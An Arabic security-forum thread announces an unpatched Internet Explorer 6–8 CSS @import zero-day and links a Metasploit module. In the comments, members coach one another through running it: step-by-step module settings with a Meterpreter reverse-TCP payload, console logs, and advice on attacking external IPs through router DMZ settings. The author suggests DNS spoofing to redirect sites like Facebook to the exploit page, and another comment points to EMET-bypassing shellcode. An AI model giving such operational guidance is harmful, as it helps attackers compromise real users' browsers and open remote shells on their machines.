تم أكتشاف ثغرة 0-day قابلة للاستغلال عن بعد في متصفح مايكروسوف الشهير و المستخدم بشكل كبير من قبل الكثير من المستخدمين حول العالم Internet Explorer اصابت الاصدارات 6 و 7 و 8 .
سبب هذه الثغرة هو خطأ في محرك HTML الخاص بمايكروسوفت (mshtml) عند ترجمة صفحة CSS تحتوي على عدد من طلبات import@ بترتيب معين مما يمكن المهاجم من تنفيذ كود خبيث و اختراق الجهاز عن طريق صفحة معدة بشكل خاص.
استغلال الثغرة يتخطى تقنيات windows لمنع استغلال الثغرات (DEP و ASLR) دون الحاجة الى استخدام اي طرق اخرى لهذا الغرض.
تمت تجربة الثغرة بنجاح على Internet Explorer 8 في انظمة Windows 7 و windows Vista SP2 و Windows XP SP3. بالاضافة الى ذلك فقد تمت تجربة الثغرة بنجاح على Internet Explorer 7 و 6 في Windows XP SP3.
فيديو يوضح استغلال الثغرة
{flv}ms-ie-0day{/flv}
من الجدير بالذكر أن Microsoft لم تصدر ترقيع للثغرة حتى الان لذلك فنحن ننصح الجميع باستخدم متصفح اخر غير Internet Explorer مثل firefox.
لمزيد من المعلومات: Microsoft Releases Security Advisory 2488013
استغلال الميتاسبلويت: ms11_xxx_ie_css_import.rb
اشكرك استاذي الغالي زيد
على اطروحاتك المتميزه والجديده
حبيت اسألك :
طرحت شركة Trend Micro مجموعة من الادوات التي تحاول التصدي
لثغرات الزيرو منها اداة Browser Guard 2010
هل نجحت في التصدي لهذه الثغره قبل ترقيعها ؟
اتمنى تجربة الاداة واخبارنا بمدى فاعليتها ؟
http://free.antivirus.com/prevention-tools/
شكراً لك
وين الاستغلال ؟!
أشكرك أخى جزيل الشكر، ولى سؤال بسيط عندما أحاول أستخدمها remote عبر برنامج metasploit تخرج لى الرساله
Exploit exception: The address is already in use (41.00.00.00:8080)
فهل بالإمكان اخبارى كيفية استغلالها remote علامًا بأنى أعمل على أبونتوا 9.10
وشكرًا
SaibEr: بصراحة لم اجرب Browser Guard لذلك فلا استطيع الجزم.
wesam: اللنك في اخر الموضوع.
saleh abbas: غير الايبي الى ايبي جهازك و اذا كان لديك ويب سيرفر يعمل على المنفذ 8080 قم باطفائه او غير المنفذ الذي تعمل عليه الثغرة
وين الملف الhtml الي برفعه على السيرفر؟؟
و ليش بطبق الملف الروبي اذا فيها شل تفتح الcalculater
السلام عليكم
أخي زيد مشكور
ومشكلة الأخ saleh abbas
أخي عندما تشوف خيارات الثغرة
الخيار الأتي
SRVHOST 0.0.0.0 yes The local host to listen on.
لاتغيره خلي على حاله
أما الخيار
URIPATH no The URI to use for this exploit (default is random)
فضع /
set URIPATH /
وتختار البايلود يلي يناسبك
وتضع LHOST
أيبي جهازك
أرجو ان تكون وصلت الفكرة :):)
السلام عليكم
أخي زيد مشكور
ومشكلة الأخ saleh abbas
أخي عندما تشوف خيارات الثغرة
الخيار الأتي
SRVHOST 0.0.0.0 yes The local host to listen on.
لاتغيره خلي على حاله
أما الخيار
URIPATH no The URI to use for this exploit (default is random)
فضع /
set URIPATH /
وتختار البايلود يلي يناسبك
وتضع LHOST
أيبي جهازك
أرجو ان تكون وصلت الفكرة :):)
أشكرك حبيبى وجارى تجربة ذلك،
أخى أنا أريد تجربة ذلك الثغرى على الآبى الخارجى لدى وليس الداخلى فهل هذا ممكن وكيف ؟
أخي saleh abbas
الميتا ع الشبكة الخارجية لحد الأن مجهولة
يعني في أحتمال أكثر من 75% ماتشتغل
لان اتصال الانترنيت يمر عبر أكثر من سيرفر
وفي احتمال ان يوجد جدار الحماية على أحد السيرفرات و يوقف عمل الثغرة
وأحتمال ان الجهاز المستهدف يكون موجود خلف روتر أو مركب جدار حماية
ولكن إذا لم يكن أي شي مم ذكر
يجب أن يكون لديك أيبي حقيقي
وتكون مفعل خاصية DMZ في خصائص الرواتر
تقبل مروري…
وهو كذلك أخى الفاضل، وأعتذر عن كثرة الأسئلة
مشكور أخ زيد على الموضوع, وجزاك الله كل خير …
نشر الأخ بشار في مجتمع الحماية العربي موضوع عن الحماية من الثغرة بإستعمال الEMET (Enhanced Mitigation Experience Toolkit v2.0) والتي بإستعمالها قد تحد من”إستغلال” الثغرة.
http://goo.gl/vk3Cu
في وقت سابق قام Skypher بنشر مقالة عن صنع ٍShellcodes تقوم بتخطي خاصية “Export address table Address Filter (EAF)” الموجودة في EMET عن طريق إيهام EAF أن من يقوم بإستدعاء الدوال هو العملية نفسها وليس الShellcode.
المزيد :http://goo.gl/v9NAm
دمتم بود
السلام عليكم ورحمة الله وبركاته
اهلاً اخي زيد شرح رائع من شخص مميز
بعض الاستفسارات اتمنى ما تكون ثقيله عليك
…
استغليت الثغرة على جهازي الوهمي : windows xp back 2 or window 7
كان تطبيقي لثغرة هاكذا :
1 – use windows/smb/ms11_xxx_ie_css_import
set payload windows/meterpreter/reverse_tcp – 2
3 – srvhost ip هنا حطيت ايبي الجهاز الوهمي المستهدف …
4- srvport 8080 لم اغير شيئ منه
5 – set lhost ip الايبي تبع المهاجم كان ايبي ثابت 77.3X.xx.xx
6 – set lport 4444
7 – exploit
كان الرد :
————————————-
[*] Exploit running as background job.
[*] Started reverse handler on 77.3x.xx.xx:4444
[-] Exploit exception: The address is already in use (192.168.99.129:8080).
——————————————–
غيرت set srvhost بـ ip المهاجم ..
فأصبح الرد هاكذا :
——————————————–
[*] Exploit running as background job.
[*] Started reverse handler on 77.30.46.92:4444
[*] Using URL: http://77.3x.xx.xx:8080/35FgrgDa2
[*] Server started.
————————————————-
فذهبت الى الجهاز الوهمي ( المستهدف )فوضعت الرابط في http://77.3x.xx.xx:8080/35FgrgDa2
المتصفح
فأتاني الرد على metasploit
————————————————–
[*] Received request for “/35FgrgDa2/”
[*] Checking user agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] Sending windows/smb/ms11_xxx_ie_css_import redirect to 77.30.46.92:48302 (target: Internet Explorer 6)…
[*] Received request for “/35FgrgDa2/QLS4n.html”
[*] Checking user agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] Sending windows/smb/ms11_xxx_ie_css_import HTML to 77.3x.xx.xx:48302 (target: Internet Explorer 6)…
[*] Received request for “/35FgrgDa2/ xECx83x80xECx83x80xECx83x80xECx83x80xECx8
3x80xECx83x80xECx83x80xECx83x80″
[*] Checking user agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] Sending windows/smb/ms11_xxx_ie_css_import CSS to 77.3x.xx.xx:48302 (target: Internet Explorer 6)…
———————————————————
بعد الرد لا اعلم ماذا افعل ؟ لماذا لا يتصنت بالميتربيتر وانا وضعت البايلود .؟.؟
وهل الطريقه الثانيه صحيحه ( غيرت set srvhost بـ ip المهاجم .. ) ؟!!!
وهل لها استغلال ثاني remote فقط بأيبي المستهدف ولا داعي للمتصفح ووضع الرابط ؟؟
عذراً لأطالتي في الرد و اتمنى ان لا تكون اسألتي مضايفه لك ..
تحيتي وتقديري .. TaLaL
@Talal: هو srvhost ايبي المهاجم و اللذي سيتم تشغيل الويب سيرفر عليه.
شيئ ثاني الثغرة هي مخصصة لمتصفح internet explorer و انت تصفحت الصفحة باستخدام firefox !!
هي الثغرة ريموات اي بامكانك استغلالها عن بعد … هذا لا يعني انها لا تتطلب تدخل المستخدم … بامكانك عم dns spoofing و تحويل الطلبات لموقع معين مثل facebook الى الصفحة المصابة.
اولاً اشكرك على سرعة الرد .. واشكرك على تواضعكـ …
اخي زيد انا لم افتح الرابط بـ firefox في جهاز المستهدف ..!! ولا يوجد على الجهاز الوهمي ابداً … وهذه صوره تدل .. http://upload.traidnt.net/upfiles/CXV17342.png
هل يمكن ان تكون بسبب طريقة الاتصال في الوهمي !!
صوره توضح اعدادات الاتصال في الوهمي http://upload.traidnt.net/upfiles/WFP17579.png
————————
بامكانك عم dns spoofing و تحويل الطلبات لموقع معين مثل facebook الى الصفحة المصابة.
———————–
ممكن توضح الفكره هاذي او تشرحها ! < لا داعي لشرحها اذا كان به مضايقه او ثقل عليك >
وشكراً اخي زيد
مشكورررررر اخي العزيز
اخي هل هذه الثغرة يمكن استخدامها بطريقة “ضع رابط الباتش هناا”